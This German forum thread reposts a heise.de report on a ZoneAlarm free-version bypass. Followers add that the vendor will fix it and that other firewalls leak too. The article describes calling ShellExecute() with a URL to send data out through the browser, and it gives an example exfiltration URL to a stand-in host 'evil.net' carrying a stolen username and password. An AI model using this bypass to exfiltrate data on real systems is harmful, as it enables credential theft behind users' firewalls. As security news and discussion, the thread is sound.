ZoneAlarm mit Zweiklassensicherheit

#1 Der Hersteller der Personal Firewall ZoneAlarm räumt die Existenz eines "theoretischen Sicherheitsproblems" in der kostenlosen Version seines Produkts ein. Zone Labs sieht aber keine Veranlassung, dieses zu beseitigen: Schließlich sei es in den kostenpflichtigen Versionen bereits behoben.

Ein Posting auf der Mailing-Liste BugTraq beschreibt einen einfachen Weg, ZoneAlarm auszutricksen. Um an den Sperren der Personal Firewall vorbei Daten ins Internet zu übermitteln, kann ein Programm die Funktion ShellExecute() der Windows-Bibliothek shell32.dll mit einer URL aufrufen. Dann startet das System den Standard-Browser mit dieser URL. Der Browser darf normalerweise über Port 80 ins Internet und kann somit über eine URL wie etwa


http://evil.net/collect.cgi?stolen_username&pw=stolen_password


Daten vom lokalen Rechner an einen beliebigen Server senden.

In einer Antwort auf das Posting räumt Te Smith vom Hersteller Zone Labs die Existenz des Problems zwar ein. Als Abhilfe empfiehlt er jedoch lediglich den Umstieg auf die kostenpflichtigen Versionen ZoneAlarm Pro/Plus, die seit November 2002 beziehungsweise Februar 2003 solche ShellExecute-Aufrufe abfangen können. Eine Notwendigkeit, diese Funktion auch in die kostenlose Version einzubauen, sieht er nicht: "Wir haben die Sicherheit unseres kostenlosen ZoneAlarm kontinuierlich erhöht, [...], aber wir bauen nicht alle erweiterte Funktionen in dieses Basisprodukt ein", schließt er sein Posting.

Nun ist gerade die Kontrolle darüber, welche Programme mit dem Internet kommunizieren dürfen, eine der sinnvollen Anwendungen für eine Personal Firewall. Wenn Zone Labs also bewusst darauf verzichtet, die kostenlose Version gegen solch einfache Umgehungsversuche zu schützen, könnten sich viele Anwender deren Installation auch gleich sparen. Schließlich enthält Windows XP bereits die eingebaute Internetverbindungs-Firewall, mit der man Verbindungen von außen abblocken kann. (ju/c't)

Quelle:
http://www.heise.de/security/news/meldung/38259
__________
Es irrt der Mensch, solang' er strebt. (Goethe)

#2 ZoneAlarm hat heute Nacht angegkündigt den Fehler in der free-Version zu beseitigen!

http://www.extremetech.com/article2/0,3973,1179181,00.asp
__________
powered by http://different-thinking.de - Netze, Protokolle, Sicherheit, ...

#3 Tja, und was ist mit den anderen Firewalls (z.B. Outpost, Kerio2, evtl Sygate,...) die ebenfalls verwundbar sind?
Das ist überhaupt kein "ZA-Problem", sondern ein "Firewall-Problem" - nämlich schlicht und ergreifend ein 'neues' Leak...
Und was ist mit den anderen, z.T. wesentlich gefährlicheren Leaks, die in letzter Zeit demonstriert wurden (Copycat, Thermite, Wallbreaker,...), gegen die ZA völlig machtlos ist?!

Dazu kommt noch, dass auch das angeblich sichere ZA Pro den aktuellen Exploit nur teilweise abfängt: wenn der Standardbrowser schon läuft, bemerkt auch ZA Pro nicht, das ein 'böses' Programm Daten über den Browser versendet...

Also eine völlig sinnlose Diskussion...
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?